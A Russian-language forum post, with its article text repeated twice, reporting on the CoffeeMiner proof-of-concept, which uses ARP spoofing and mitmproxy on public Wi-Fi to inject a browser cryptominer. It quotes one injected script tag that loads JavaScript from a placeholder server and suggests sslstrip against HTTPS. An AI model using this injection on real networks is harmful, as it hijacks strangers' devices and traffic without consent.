GendaldMag
New Member
- Регистрация
- 27.03.18
- Сообщения
- 15
- Реакции
- 4
- Баллы
- 3
Исследователь предложил майнить с помощью Wi-Fi сетей и атаки CoffeeMiner
Независимый ИБ-специалист, известный как Arnau, опубликовал интересный proof-of-concept, получивший название CoffeeMiner, и сопряженное с ним исследование. На создание этого проекта специалиста вдохновил инцидент, произошедший в декабре 2017 года в Буэнос-Айресе. Тогда обнаружилось, что местная сеть кофеен Starbucks предлагает своим посетителям не просто подключение к сети Wi-Fi, но скрыто майнит криптовалюту, с помощью подключившихся к публичной сети девайсов.
rnau подчеркивает, что публикует концепт CoffeeMiner и исходники исключительно как теоретическое академическое исследование, созданное для обучающих и исследовательских целей. Атака, в сущности, повторяет случившееся в Аргентине и позволяет осуществить своеобразную атаку man-in-the-middle. CoffeeMiner предназначен для спуфинга Address Resolution Protocol (ARP) с целью перехвата незашифрованного трафика от устройств, находящихся в той же сети. Для инъекции HTML-кода в незащищенный трафик используется известный инструмент mitmproxy, выглядит это следующим образом:
<_script src=»http:_//httpserverIP:8000/script_.js» type=»text/javascript»></_script>
В результате запустится JavaScript, который будет оттягивать ресурсы CPU жертвы на майнинг. В своих испытаниях исследователь использовал популярный «браузерный» майнинговый скрипт Coinhive и добывал криптовалюту Monero.
Специалист отмечает, что такую атаку можно с легкостью автоматизировать. И хотя в текущем виде CoffeeMiner не может работать с HTTPS, эту проблему можно решить, к примеру, с помощью sslstrip.
Независимый ИБ-специалист, известный как Arnau, опубликовал интересный proof-of-concept, получивший название CoffeeMiner, и сопряженное с ним исследование. На создание этого проекта специалиста вдохновил инцидент, произошедший в декабре 2017 года в Буэнос-Айресе. Тогда обнаружилось, что местная сеть кофеен Starbucks предлагает своим посетителям не просто подключение к сети Wi-Fi, но скрыто майнит криптовалюту, с помощью подключившихся к публичной сети девайсов.

rnau подчеркивает, что публикует концепт CoffeeMiner и исходники исключительно как теоретическое академическое исследование, созданное для обучающих и исследовательских целей. Атака, в сущности, повторяет случившееся в Аргентине и позволяет осуществить своеобразную атаку man-in-the-middle. CoffeeMiner предназначен для спуфинга Address Resolution Protocol (ARP) с целью перехвата незашифрованного трафика от устройств, находящихся в той же сети. Для инъекции HTML-кода в незащищенный трафик используется известный инструмент mitmproxy, выглядит это следующим образом:
<_script src=»http:_//httpserverIP:8000/script_.js» type=»text/javascript»></_script>
В результате запустится JavaScript, который будет оттягивать ресурсы CPU жертвы на майнинг. В своих испытаниях исследователь использовал популярный «браузерный» майнинговый скрипт Coinhive и добывал криптовалюту Monero.
Специалист отмечает, что такую атаку можно с легкостью автоматизировать. И хотя в текущем виде CoffeeMiner не может работать с HTTPS, эту проблему можно решить, к примеру, с помощью sslstrip.
Последнее редактирование модератором: